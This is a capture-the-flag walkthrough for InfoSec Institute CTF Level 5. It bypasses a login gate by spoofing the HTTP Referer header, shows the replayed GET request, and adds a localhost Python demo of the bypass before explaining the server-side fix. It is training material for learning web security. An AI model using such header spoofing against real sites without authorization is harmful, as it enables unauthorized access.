A Step-by-Step Walkthrough Solution to InfoSec Institute CTF Level 5 (Practical Web Hacking)

The Level can be accessed here.

The question says: "It seems you have encountered a page which requires users to login before viewing. Do some magic without having to log in."

The hint says you need to play with the headers, specifically HTTP_REFERER. (That is the name PHP gives the header in $_SERVER; on the wire it is spelled Referer, with the historic misspelling.)

On analysing the page source we see that the login button is disabled.

We remove the disabled attribute using the Inspector in Firefox and follow the button to the login page, login.html (http://ctf.infosecinstitute.com/ctf2/exercises/login.html).

Using the Firefox add-on Live HTTP Headers we capture the HTTP request made when we click the login link. We find:

[Screenshot: Live HTTP Headers dialog showing the captured request]

For the final step we change the Referer header to http://ctf.infosecinstitute.com/ctf2/exercises/login.html and resend the request using the Replay button at the bottom of the dialog box. The server only checks that the request appears to come from the login page; since the Referer is set by the client, we can simply claim that it does.

So we make an HTTP GET request to the level 5 page (ex5.php) with the Referer set as above:

    GET /ctf2/exercises/ex5.php HTTP/1.1
    Host: ctf.infosecinstitute.com
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://ctf.infosecinstitute.com/ctf2/exercises/login.html
    Cookie: _ga=GA1.2.1087367223.1443120058; PHPSESSID=kft73fn8csor9k0f0s4n5hkdv4
    Connection: keep-alive

and we get the success message:

The same can be achieved with Burp Suite Free Edition as well, by sending the captured request to Repeater and editing the Referer header there.
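To show why this check is bypassable without touching the real CTF server, here is an added example (my own code, not part of the original walkthrough or the InfoSec Institute CTF). It runs a constructed stand-in for ex5.php on localhost that grants access only when the Referer equals the login page URL, the same weak check the level relies on, and then replays the request twice: once as a plain GET and once with the spoofed Referer, exactly what the Replay button or Burp Repeater does. The paths and the login URL are taken from the level; the server logic is an assumption about how ex5.php behaves.

```python
"""Bypassing a Referer-based access check (added example, not CTF code)."""
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

# Values from the level; the server below is a constructed stand-in for ex5.php.
LOGIN_PAGE = "http://ctf.infosecinstitute.com/ctf2/exercises/login.html"
PROTECTED_PATH = "/ctf2/exercises/ex5.php"


class RefererCheckHandler(BaseHTTPRequestHandler):
    """Assumed behaviour of ex5.php: access is granted purely on the Referer."""

    def do_GET(self):
        if self.path != PROTECTED_PATH:
            self._reply(404, b"not found")
            return
        # The flawed access control: Referer is attacker-controlled input,
        # so anyone who can edit a request header passes this test.
        if self.headers.get("Referer") == LOGIN_PAGE:
            self._reply(200, b"SUCCESS: you reached the protected page")
        else:
            self._reply(403, b"You must login first")

    def _reply(self, status, body):
        self.send_response(status)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # silence request logging
        pass


def start_server():
    """Start the stand-in server on an ephemeral loopback port."""
    server = HTTPServer(("127.0.0.1", 0), RefererCheckHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, server.server_address[1]


def fetch(port, referer=None):
    """GET the protected page, optionally with a spoofed Referer.

    Returns (status_code, body). Mirrors the replayed request from the
    walkthrough: same path, same Host, Referer added by hand.
    """
    headers = {"Host": "ctf.infosecinstitute.com"}
    if referer is not None:
        headers["Referer"] = referer
    conn = http.client.HTTPConnection("127.0.0.1", port, timeout=5)
    conn.request("GET", PROTECTED_PATH, headers=headers)
    resp = conn.getresponse()
    body = resp.read().decode()
    conn.close()
    return resp.status, body


def demo():
    """Run both requests against the stand-in; returns (blocked, bypassed)."""
    server, port = start_server()
    try:
        blocked = fetch(port)                       # direct request, no Referer
        bypassed = fetch(port, referer=LOGIN_PAGE)  # replayed with spoofed Referer
    finally:
        server.shutdown()
        server.server_close()
    return blocked, bypassed


if __name__ == "__main__":
    blocked, bypassed = demo()
    print("without Referer:     ", blocked)
    print("with spoofed Referer:", bypassed)
```

The first request comes back 403 and the second 200, which is the whole lesson of the level: Referer (like every other request header) is supplied by the client and proves nothing about where the user has been. It is also unreliable even for benign users, since browsers and proxies strip it depending on Referrer-Policy and HTTPS-to-HTTP transitions. A real login gate has to key off server-side session state set after successful authentication, not off a header the user can type.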